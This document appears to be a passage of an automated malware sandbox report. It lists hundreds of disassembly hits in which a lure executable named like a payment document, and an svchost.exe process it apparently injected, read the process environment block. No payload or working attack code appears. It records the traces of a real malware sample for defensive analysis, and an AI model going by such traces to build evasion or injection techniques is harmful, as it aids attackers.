                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_041C0770 mov eax, dword ptr fs:[00000030h]0_2_041C0770
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_041BF0E0 mov eax, dword ptr fs:[00000030h]0_2_041BF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF367 mov eax, dword ptr fs:[00000030h]1_2_036EF367
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]1_2_03637370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]1_2_03637370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]1_2_03637370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705341 mov eax, dword ptr fs:[00000030h]1_2_03705341
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]1_2_03629353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]1_2_03629353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365F32A mov eax, dword ptr fs:[00000030h]1_2_0365F32A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03627330 mov eax, dword ptr fs:[00000030h]1_2_03627330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]1_2_036B930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]1_2_036B930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]1_2_036B930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF3E6 mov eax, dword ptr fs:[00000030h]1_2_036EF3E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037053FC mov eax, dword ptr fs:[00000030h]1_2_037053FC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]1_2_036EB3D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036533A5 mov eax, dword ptr fs:[00000030h]1_2_036533A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]1_2_036633A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]1_2_036633A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370539D mov eax, dword ptr fs:[00000030h]1_2_0370539D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]1_2_036FD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]1_2_036FD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03659274 mov eax, dword ptr fs:[00000030h]1_2_03659274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]1_2_03671270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]1_2_03671270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]1_2_03629240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]1_2_03629240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366724D mov eax, dword ptr fs:[00000030h]1_2_0366724D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]1_2_036EB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]1_2_036EB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705227 mov eax, dword ptr fs:[00000030h]1_2_03705227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]1_2_03667208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]1_2_03667208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037052E2 mov eax, dword ptr fs:[00000030h]1_2_037052E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF2F8 mov eax, dword ptr fs:[00000030h]1_2_036EF2F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036292FF mov eax, dword ptr fs:[00000030h]1_2_036292FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]1_2_036392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]1_2_036392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]1_2_0362B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]1_2_0362B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]1_2_0362B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]1_2_0365F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]1_2_0365F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]1_2_036C72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]1_2_036C72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705283 mov eax, dword ptr fs:[00000030h]1_2_03705283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]1_2_0366329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]1_2_0366329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C9179 mov eax, dword ptr fs:[00000030h]1_2_036C9179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705152 mov eax, dword ptr fs:[00000030h]1_2_03705152
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C3140 mov eax, dword ptr fs:[00000030h]1_2_036C3140
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C3140 mov eax, dword ptr fs:[00000030h]1_2_036C3140
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C3140 mov eax, dword ptr fs:[00000030h]1_2_036C3140
